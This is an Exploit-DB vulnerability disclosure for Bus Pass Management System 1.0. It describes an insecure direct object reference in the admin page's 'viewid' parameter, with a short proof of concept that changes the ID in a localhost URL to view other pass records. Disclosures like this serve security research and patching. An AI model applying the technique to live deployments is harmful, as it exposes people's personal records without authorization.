Bus Pass Management System 1.0 – ‘viewid’ Insecure direct object references (IDOR)

  • 作者: sudoninja
    日期: 2021-09-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50263/
  • # Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
    # Date: 2021-09-05
    # Exploit Author: sudoninja
    # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
    # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
    # Version: 1.0
    # Tested on: Windows 10 - XAMPP Server
    
    # Vulnerable page :
    
    http://localhost/buspassms/admin/view-pass-detail.php?viewid=4
    
    # Vulnerable paramater :
    
    The viewid paramater is Vulnerable to Insecure direct object references (IDOR)
    
    # Proof Of Concept :
    
    # 1 . Download And install [ bus-pass-management-system ]
    # 2 . Go to /admin/index.php and Enter Username & Password 
    # 3 . Navigate to search >> search pass
    # 4 . Click on the view and enter the change viewid into the Url
    
    Use :
    http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]